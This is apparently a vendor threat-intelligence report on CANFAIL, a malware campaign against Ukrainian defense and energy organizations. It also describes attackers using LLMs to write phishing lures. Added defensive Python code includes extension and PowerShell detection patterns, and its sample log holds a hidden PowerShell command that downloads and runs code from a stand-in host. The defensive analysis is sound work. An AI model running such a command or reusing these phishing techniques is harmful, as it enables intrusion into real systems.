Technical Analysis of CANFAIL Malware Targeting Ukrainian Defense and Energy Sectors by Suspected Russian Threat Actor

Feb 15

Executive Summary

Google’s Threat Analysis Group (TAG) has recently attributed a series of highly targeted cyberattacks against Ukrainian organizations to a suspected Russian state-aligned threat actor. These attacks are characterized by the deployment of a novel malware family, CANFAIL, which is delivered through advanced phishing campaigns leveraging social engineering and cloud-based delivery mechanisms. The primary targets include Ukrainian defense, government, energy, and humanitarian sectors, with evidence of reconnaissance and attempted compromise in neighboring countries such as Romania and Moldova. The sophistication of the campaign, including the use of Large Language Models (LLMs) for crafting phishing lures and automating reconnaissance, marks a significant evolution in the threat landscape. This report provides a comprehensive technical analysis of the CANFAIL malware, the tactics, techniques, and procedures (TTPs) employed by the threat actor, observed exploitation in the wild, victimology, and actionable mitigation strategies.

Threat Actor Profile

The threat actor behind the CANFAIL campaign is assessed by Google TAG as likely affiliated with Russian intelligence services, though it has not yet been assigned a formal APT designation. This group demonstrates a growing operational maturity, leveraging both traditional spearphishing and modern AI-driven techniques. Unlike more established Russian APTs such as APT28 (Fancy Bear) or APT29 (Cozy Bear), this actor is notable for its rapid adoption of LLMs to enhance the quality and targeting of phishing lures, automate reconnaissance, and streamline command and control (C2) operations. The actor’s infrastructure and operational security are less sophisticated than top-tier APTs, but the use of cloud services and memory-resident malware increases the difficulty of detection and attribution. The group’s targeting aligns with Russian strategic interests in the region, focusing on critical infrastructure, military, and organizations supporting Ukraine’s war effort.

Technical Analysis of Malware/TTPs

The CANFAIL malware is a multi-stage, memory-resident payload delivered via highly targeted phishing emails. The initial infection vector is a spearphishing email, often impersonating Ukrainian or Romanian energy organizations. These emails contain links to Google Drive hosting RAR archives. The archive includes a file with a double extension, such as invoice.pdf.js, designed to appear as a benign document but is in fact an obfuscated JavaScript file.

Upon execution, the JavaScript initiates a PowerShell script that downloads and executes a memory-only dropper. This dropper establishes persistence and initiates C2 communication with attacker-controlled infrastructure, typically leveraging dynamic DNS and cloud-based endpoints to evade static detection. The malware displays a fake error message to the user to reduce suspicion and hinder incident response.

The CANFAIL payload is capable of credential harvesting, system reconnaissance, and lateral movement. It employs advanced obfuscation techniques, including string encoding and anti-analysis checks, to evade endpoint detection and response (EDR) solutions. The use of LLMs by the threat actor is evident in the highly personalized phishing lures and the automation of post-exploitation tasks, such as generating custom C2 instructions and crafting convincing decoy documents.

Related campaigns, such as PhantomCaptcha (documented by SentinelOne SentinelLABS), have been linked to the same actor. These campaigns utilize similar phishing techniques, including fake web pages with ClickFix-style instructions and the delivery of WebSocket-based trojans, further demonstrating the actor’s evolving toolkit.

Exploitation in the Wild

The CANFAIL campaign has been observed actively targeting Ukrainian defense, military, government, and energy organizations. There is also evidence of attempted compromise in the aerospace, manufacturing (particularly those with military or drone ties), nuclear and chemical research, and international humanitarian sectors. The threat actor has expanded reconnaissance activities into Romania and Moldova, focusing on energy sector organizations with Ukrainian connections.

Successful exploitation results in unauthorized access to both organizational and personal email accounts, with the potential for further lateral movement and data exfiltration. The use of memory-resident malware and cloud-based delivery mechanisms complicates detection and remediation efforts. The campaign’s reliance on social engineering and AI-generated content increases the likelihood of user interaction and successful compromise.

Victimology and Targeting

The primary victims of the CANFAIL campaign are Ukrainian organizations involved in defense, government, energy, and humanitarian aid. The actor has demonstrated a particular interest in entities supporting Ukraine’s war effort, including international organizations involved in conflict monitoring and relief. Secondary targeting includes Romanian and Moldovan energy companies, likely as part of broader reconnaissance and supply chain compromise efforts.

The actor’s targeting methodology is highly selective, utilizing curated email address lists derived from open-source intelligence and proprietary research. Phishing lures are tailored to the recipient’s sector and region, often referencing current events or organizational relationships to increase credibility. The use of LLMs enables the rapid generation of convincing, context-aware phishing content, further increasing the campaign’s effectiveness.

Mitigation and Countermeasures

Organizations are advised to implement a multi-layered defense strategy to mitigate the risk posed by the CANFAIL campaign. User awareness training is critical, with a focus on recognizing phishing emails that deliver files with double extensions or contain unexpected Google Drive links. Email security solutions should be configured to block or flag attachments with suspicious file extensions, such as .pdf.js, and to scan compressed archives for embedded scripts.
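One way to implement the extension and archive checks just described, written here as an added Python example (it is not code from the report or from any Rescana product): the extension lists, the share-link pattern and the file names are assumptions chosen to mirror the invoice.pdf.js-in-a-RAR lure, and the archive check works from a member listing so no extraction is needed.

```python
import re
from dataclasses import dataclass

# Extensions Windows hands to a script host or loader when double-clicked (assumed list).
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "hta", "ps1", "cmd", "bat", "exe", "scr", "lnk"}
# Extensions a recipient expects to open as a harmless document or image (assumed list).
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "jpg", "png"}
# Container formats whose members must be inspected, not just the container itself.
ARCHIVE_EXTS = {"rar", "zip", "7z", "iso", "img"}
# Share-link pattern for the cloud host the campaign used to stage its archives.
DRIVE_LINK = re.compile(r"https?://drive\.google\.com/\S+", re.IGNORECASE)


@dataclass
class Verdict:
    name: str
    action: str   # "allow", "flag" or "block"
    reason: str


def classify_filename(name: str) -> Verdict:
    """Judge a filename by its whole extension chain, not only the last element."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = [p.strip() for p in base.split(".")]   # strip() also defeats "invoice.pdf    .js" padding
    if len(parts) < 2 or parts[-1] == "":
        return Verdict(name, "allow", "no usable extension")
    exts, final = parts[1:], parts[-1]
    if final in SCRIPT_EXTS:
        if any(e in DOC_EXTS for e in exts[:-1]):
            return Verdict(name, "block", f"document extension masking executable .{final}")
        return Verdict(name, "block", f"executable/script extension .{final}")
    if final in ARCHIVE_EXTS:
        return Verdict(name, "flag", f"archive .{final}: inspect its members")
    return Verdict(name, "allow", "ordinary extension")


def scan_archive(archive_name: str, members: list) -> Verdict:
    """Decide on an archive from the listing of its member names (no extraction required)."""
    outer = classify_filename(archive_name)
    if outer.action != "flag":
        return outer
    blocked = [v for v in (classify_filename(m) for m in members) if v.action == "block"]
    if blocked:
        return Verdict(archive_name, "block", "contains " + "; ".join(f"{v.name} ({v.reason})" for v in blocked))
    return Verdict(archive_name, "allow", "members look like ordinary documents")


def find_cloud_share_links(body: str) -> list:
    """Return Google Drive share links in a message body, for analyst review or sandbox detonation."""
    return DRIVE_LINK.findall(body)
```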

Endpoint protection platforms must enable and monitor PowerShell script block logging to detect anomalous script execution. Security teams should monitor for unusual downloads from cloud storage services, particularly Google Drive, and investigate any instances of memory-resident PowerShell activity. Threat intelligence feeds should be leveraged to block known malicious domains, file hashes, and C2 endpoints associated with the campaign.
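A triage pass over PowerShell script block logging (Event ID 4104) that looks for the fetch-and-run-in-memory chain described in this report, added here as an example and not taken from the report or from Rescana tooling: the indicator weights, the threshold and the sample records are assumptions, and the records are constructed rather than real telemetry. It reassembles multi-part 4104 records first, because a long block is logged in chunks and a keyword split across two chunks would otherwise be missed.

```python
import re

# Weighted indicators of fetch-and-run-in-memory behaviour in PowerShell script blocks.
# Weights and the threshold are assumptions for this example; tune them against your own baseline.
INDICATORS = [
    (re.compile(r"invoke-expression|\biex\b", re.I), 3, "dynamic evaluation of a string"),
    (re.compile(r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod", re.I), 2, "remote content fetch"),
    (re.compile(r"frombase64string", re.I), 2, "base64 payload decoding"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-nop(rofile)?\b|executionpolicy\s+bypass|-ep\s+bypass", re.I), 1, "profile/policy bypass"),
]


def reassemble(events: list) -> list:
    """Join multi-part 4104 records (same ScriptBlockId, ordered by MessageNumber) into whole blocks."""
    by_id = {}
    for ev in events:
        by_id.setdefault(ev["ScriptBlockId"], []).append(ev)
    blocks = []
    for sbid, chunks in by_id.items():
        chunks.sort(key=lambda e: e.get("MessageNumber", 1))
        blocks.append({"ScriptBlockId": sbid, "Path": chunks[0].get("Path", ""),
                       "ScriptBlockText": "".join(c["ScriptBlockText"] for c in chunks)})
    return blocks


def triage_4104(events: list, threshold: int = 5) -> list:
    """Score each reassembled script block and return those at or above the threshold."""
    findings = []
    for blk in reassemble(events):
        score, reasons = 0, []
        for rx, weight, why in INDICATORS:
            if rx.search(blk["ScriptBlockText"]):
                score, reasons = score + weight, reasons + [why]
        if not blk["Path"]:   # empty Path: no script file on disk backed this block
            score, reasons = score + 1, reasons + ["no backing script file (memory-only)"]
        if score >= threshold:
            findings.append({"ScriptBlockId": blk["ScriptBlockId"], "score": score, "reasons": reasons})
    return findings


SAMPLE_4104 = [   # constructed records carrying the 4104 fields this example reads; not real telemetry
    {"ScriptBlockId": "a1", "MessageNumber": 1, "Path": "C:\\Scripts\\inventory.ps1",
     "ScriptBlockText": "Get-ChildItem C:\\Data -Recurse | Export-Csv inventory.csv"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "Path": "",
     "ScriptBlockText": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).Down"},
    {"ScriptBlockId": "b2", "MessageNumber": 2, "Path": "",
     "ScriptBlockText": "loadString('http://updates.example.invalid/s')\""},
]
```

Feed the output into your alerting pipeline keyed on ScriptBlockId, and pair it with the 4103 pipeline-execution events for the same host to recover the parent chain the 4104 record itself does not carry.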

Incident response plans should be updated to account for the possibility of memory-only malware and cloud-based delivery mechanisms. Regular phishing simulations and tabletop exercises can help ensure organizational readiness. Collaboration with trusted threat intelligence providers, such as Rescana, can provide timely updates on emerging threats and actionable IOCs.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring the resilience of critical business operations. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, please contact us at ops@rescana.com.